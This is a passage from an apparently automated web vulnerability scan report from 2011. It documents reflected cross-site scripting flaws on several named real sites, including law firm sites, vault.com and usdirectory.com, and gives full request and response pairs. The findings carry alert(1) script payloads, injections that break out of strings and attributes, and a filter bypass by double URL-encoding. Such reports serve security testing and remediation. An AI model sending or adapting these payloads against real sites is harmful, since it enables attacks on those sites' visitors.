This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22abc1a"%3bbdb542a73ab HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.108. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.local.com
Path:
/results.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb72"style="x:expression(alert(1))"4ccefb20720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22&dbb72"style%3d"x%3aexpression(alert(1))"4ccefb20720=1 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX law offices | Find ...[SNIP]... <select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=law offices&CID=2531/x22&dbb72"style="x:expression(alert(1))"4ccefb20720=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);"> ...[SNIP]...
4.109. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mckennacuneo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b15f'><script>alert(1)</script>1d12d371487 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5b15f'><script>alert(1)</script>1d12d371487=1 HTTP/1.1 Host: www.mckennacuneo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 16:52:37 GMT Server: Apache/2.2.15 (FreeBSD) X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15847
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.1//EN' 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'> <html xmlns='http://www.w3.org/1999/xhtml'> <head> <meta http-equiv='Content-Type' content='text/html; ...[SNIP]... <a id='emailThisPage' href='/?5b15f'><script>alert(1)</script>1d12d371487=1&email-this-page' rel='nofollow'> ...[SNIP]...
4.110. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/2011insights.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86470"-alert(1)-"c4c00aee9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011insights.cfm?86470"-alert(1)-"c4c00aee9af=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... <script type="text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
4.111. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.skadden.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUB ...[SNIP]... "text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:08 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 82130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]... var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:19 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... xt/javascript"> var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:10:14 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept-Encoding Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/ Keep-Alive: timeout=10, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/ Content-Length: 68250
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual' };
var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin' };
var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google ...[SNIP]...
4.115. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vault.com
Path:
/wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/ ...[SNIP]...
4.116. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vault.com
Path:
/wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/us ...[SNIP]...
4.125. http://www.weil.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <!-- window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O ...[SNIP]...
4.126. http://www.weil.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weil.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]> ...[SNIP]...
4.127. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
